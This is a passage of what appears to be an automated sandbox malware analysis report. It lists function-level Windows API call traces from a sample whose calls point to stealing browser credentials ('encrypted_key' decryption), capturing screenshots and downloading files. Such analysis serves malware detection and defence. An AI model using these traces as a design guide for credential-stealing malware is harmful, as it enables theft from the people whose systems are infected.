                                                                                                                                                                                                                                                    • API ID: lstrlen
                                                                                                                                                                                                                                                    • String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
                                                                                                                                                                                                                                                    • API String ID: 1659193697-51310709
                                                                                                                                                                                                                                                    • Opcode ID: 86b2195adcd8c148ec724a313ec512bb19c3104a3d0a324bd369cf79290d2001
                                                                                                                                                                                                                                                    • Instruction ID: c0d5a449e403b1d9a4aee25722f427cfa5c562a1dd95351f88fce8b0330e8a9c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 86b2195adcd8c148ec724a313ec512bb19c3104a3d0a324bd369cf79290d2001
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4F017524B94726756E712631AF85EBF3EDC4F8AFA07080426E901A5088DF5D9913F5B1
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • strtok_s.MSVCRT ref: 000935EA
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,true), ref: 000936AC
                                                                                                                                                                                                                                                      • Part of subcall function 00090549: lstrlenA.KERNEL32(?,?,00097174,000B66CF,000B66CE,?,?,?,?,0009858F), ref: 0009054F
                                                                                                                                                                                                                                                      • Part of subcall function 00090549: lstrcpyA.KERNEL32(00000000,00000000,?,00097174,000B66CF,000B66CE,?,?,?,?,0009858F), ref: 00090581
                                                                                                                                                                                                                                                    • lstrcpyA.KERNEL32(?,?), ref: 0009376E
                                                                                                                                                                                                                                                    • lstrcpyA.KERNEL32(?,00000000), ref: 0009379F
                                                                                                                                                                                                                                                    • lstrcpyA.KERNEL32(?,00000000), ref: 000937DB
                                                                                                                                                                                                                                                    • lstrcpyA.KERNEL32(?,00000000), ref: 00093817
                                                                                                                                                                                                                                                    • lstrcpyA.KERNEL32(?,00000000), ref: 00093853
                                                                                                                                                                                                                                                    • lstrcpyA.KERNEL32(?,00000000), ref: 0009388F
                                                                                                                                                                                                                                                    • lstrcpyA.KERNEL32(?,00000000), ref: 000938CB
                                                                                                                                                                                                                                                    • strtok_s.MSVCRT ref: 0009398F
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcpy$strtok_s$lstrlen
                                                                                                                                                                                                                                                    • String ID: false$true
                                                                                                                                                                                                                                                    • API String ID: 2116072422-2658103896
                                                                                                                                                                                                                                                    • Opcode ID: 82019c1e39bd8a8fc46ff597a5d9656a8975ba9034d8f3f1ee0039cf035797f1
                                                                                                                                                                                                                                                    • Instruction ID: 8beff99d12dae5187fa18fc7f74b3c7aa4cbb9ecaf76f962084e9d006e118b76
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 82019c1e39bd8a8fc46ff597a5d9656a8975ba9034d8f3f1ee0039cf035797f1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1BB12A75905119ABCF60EF54EC89ADA77B8FF24300F0101E6E59AA7262EB709F94DF40
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 00095845
                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 00095856
                                                                                                                                                                                                                                                      • Part of subcall function 00091DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00091DFD
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?), ref: 00095881
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 0009589F
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?), ref: 000958B3
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 000958C6
                                                                                                                                                                                                                                                      • Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D
                                                                                                                                                                                                                                                      • Part of subcall function 00091D92: GetFileAttributesA.KERNEL32(?,?,?,0008DA7F,?,?,?), ref: 00091D99
                                                                                                                                                                                                                                                      • Part of subcall function 0008819F: StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0008CC90,?,?), ref: 000881E5
                                                                                                                                                                                                                                                      • Part of subcall function 00087FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0008E756,?,?,?), ref: 00087FC7
                                                                                                                                                                                                                                                      • Part of subcall function 00087FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0008E756,?,?,?), ref: 00087FDE
                                                                                                                                                                                                                                                      • Part of subcall function 00087FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0008E756,?,?,?), ref: 00087FF5
                                                                                                                                                                                                                                                      • Part of subcall function 00087FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0008E756,?,?,?), ref: 0008800C
                                                                                                                                                                                                                                                      • Part of subcall function 00087FAC: CloseHandle.KERNEL32(?,?,?,?,?,0008E756,?,?,?), ref: 00088034
                                                                                                                                                                                                                                                      • Part of subcall function 000921E7: GlobalAlloc.KERNEL32(00000000,?,?,?,?,?,0009595C,?), ref: 000921F2
                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(00000000), ref: 0009596A
                                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 00095A8C
                                                                                                                                                                                                                                                      • Part of subcall function 00088048: CryptStringToBinaryA.CRYPT32(00086724,00000000,00000001,00000000,?,00000000,00000000), ref: 00088060
                                                                                                                                                                                                                                                      • Part of subcall function 00088048: LocalAlloc.KERNEL32(00000040,?,?,?,00086724,?), ref: 0008806E
                                                                                                                                                                                                                                                      • Part of subcall function 00088048: CryptStringToBinaryA.CRYPT32(00086724,00000000,00000001,00000000,?,00000000,00000000), ref: 00088084
                                                                                                                                                                                                                                                      • Part of subcall function 00088048: LocalFree.KERNEL32(?,?,?,00086724,?), ref: 00088093
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 00095A18
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,000B6645), ref: 00095A35
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,?), ref: 00095A54
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,000B6A8C), ref: 00095A65
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcat$File$AllocLocal$BinaryCryptFreeGlobalString_memset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4109952398-0
                                                                                                                                                                                                                                                    • Opcode ID: 39602dee87dd1459888b21e971f632c792da8febecaa788310d5259699df8819
                                                                                                                                                                                                                                                    • Instruction ID: 3ad54a10feadf09111ef566f0c7beabb4644bf2c0a848f9826ce28d2cd78611f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 39602dee87dd1459888b21e971f632c792da8febecaa788310d5259699df8819
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C6714EB1C4012D9FDF60EF60DC45AC9B7BABF88310F0405E6E508A3251EA329FA59F51
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00091F96
                                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00091FA4
                                                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00091FB1
                                                                                                                                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 00091FDE
                                                                                                                                                                                                                                                    • GetHGlobalFromStream.COMBASE(?,?), ref: 00092049
                                                                                                                                                                                                                                                    • GlobalLock.KERNEL32(?), ref: 00092052
                                                                                                                                                                                                                                                    • GlobalSize.KERNEL32(?), ref: 0009205E
                                                                                                                                                                                                                                                      • Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D
                                                                                                                                                                                                                                                      • Part of subcall function 00090519: lstrcpyA.KERNEL32(00000000,?,?,00081D07,?,00097621), ref: 00090538
                                                                                                                                                                                                                                                      • Part of subcall function 00085482: lstrlenA.KERNEL32(?), ref: 00085519
                                                                                                                                                                                                                                                      • Part of subcall function 00085482: StrCmpCA.SHLWAPI(?,000B6986,000B697B,000B697A,000B696F), ref: 00085588
                                                                                                                                                                                                                                                      • Part of subcall function 00085482: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 000855AA
                                                                                                                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 000920BC
                                                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 000920D7
                                                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 000920E0
                                                                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 000920E8
                                                                                                                                                                                                                                                    • CloseWindow.USER32(00000000), ref: 000920EF
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: GlobalObject$Window$DeleteSelectStreamlstrcpy$CloseCreateDesktopFromInternetLockOpenRectReleaseSizelstrlen
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1802806997-0
                                                                                                                                                                                                                                                    • Opcode ID: a4b2087bed1c5bbdc4127d51c8a11d3b37b95f1279f4971cb3204f6755fb5f22
                                                                                                                                                                                                                                                    • Instruction ID: b26a69ffa1910382516df23a2942b14d340dbad79a04e9e7bfd1d56e8363d10f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a4b2087bed1c5bbdc4127d51c8a11d3b37b95f1279f4971cb3204f6755fb5f22
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FE51EE72C01118AFDF11AFA0ED4D9EEBBB9EF48354B124126F901A6121EB309D15EBA1
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _free$__calloc_crt$Sleep__copytlocinfo_nolock__setlocale_nolock__setmbcp_nolock
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3833677464-0
                                                                                                                                                                                                                                                    • Opcode ID: 4c2c807ead96ce20ed740bcce35c77229347cc6c8b6896d5578e28fcac80adbd
                                                                                                                                                                                                                                                    • Instruction ID: 8520690e96d32ab421c3587ddb1fffb5b4f6770b9b4e0caec4824c67cb1360b0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4c2c807ead96ce20ed740bcce35c77229347cc6c8b6896d5578e28fcac80adbd
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6221E275104A01EBDB317FA5D802D8AB7E4EF93760B20C42AF58556163EF329C00EB65
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 000815BC: GetProcessHeap.KERNEL32(00000008,000000FF), ref: 000815C6
                                                                                                                                                                                                                                                      • Part of subcall function 000815BC: HeapAlloc.KERNEL32(00000000), ref: 000815CD
                                                                                                                                                                                                                                                    • MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 00081606
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0008160C
                                                                                                                                                                                                                                                    • SetCriticalSectionSpinCount.KERNEL32(00000000,00000000), ref: 00081614
                                                                                                                                                                                                                                                    • GetWindowContextHelpId.USER32(00000000), ref: 0008161B
                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(00000000,00000000), ref: 00081623
                                                                                                                                                                                                                                                    • RegisterClassW.USER32(00000000), ref: 0008162A
                                                                                                                                                                                                                                                    • IsWindowVisible.USER32(00000000), ref: 00081631
                                                                                                                                                                                                                                                    • ConvertDefaultLocale.KERNEL32(00000000), ref: 00081638
                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00081644
                                                                                                                                                                                                                                                    • IsDialogMessageW.USER32(00000000,00000000), ref: 0008164C
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00081656
                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 0008165D
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Heap$Window$MessageProcess$AllocByteCharClassContextConvertCountCriticalDefaultDialogErrorFreeHelpLastLocaleLongMultiRegisterSectionSpinVisibleWide
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3627164727-0
                                                                                                                                                                                                                                                    • Opcode ID: 169633fbd6eb47e4b9e5f793aa71e4fdcd05b2e15238dfde7b5bf40bf0af4bc7
                                                                                                                                                                                                                                                    • Instruction ID: 0627677a0cc3f2626e83b10fd5c90c13b1288b50ed3db5f4fad64373c2cfb1f3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 169633fbd6eb47e4b9e5f793aa71e4fdcd05b2e15238dfde7b5bf40bf0af4bc7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E9014672412824FBE7157BA1AD4DDDF3E6CFF4A352B040205F60A910218B7C9606CBFA
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00090519: lstrcpyA.KERNEL32(00000000,?,?,00081D07,?,00097621), ref: 00090538
                                                                                                                                                                                                                                                      • Part of subcall function 00084AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00084AE8
                                                                                                                                                                                                                                                      • Part of subcall function 00084AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00084AEE
                                                                                                                                                                                                                                                      • Part of subcall function 00084AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00084AF4
                                                                                                                                                                                                                                                      • Part of subcall function 00084AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00084B06
                                                                                                                                                                                                                                                      • Part of subcall function 00084AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00084B0E
                                                                                                                                                                                                                                                    • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00086836
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?), ref: 00086856
                                                                                                                                                                                                                                                    • InternetOpenUrlA.WININET(?,?,00000000,00000000,-00800100,00000000), ref: 00086877
                                                                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00086892
                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 000868C8
                                                                                                                                                                                                                                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 000868F8
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00086923
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0008692A
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 00086936
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
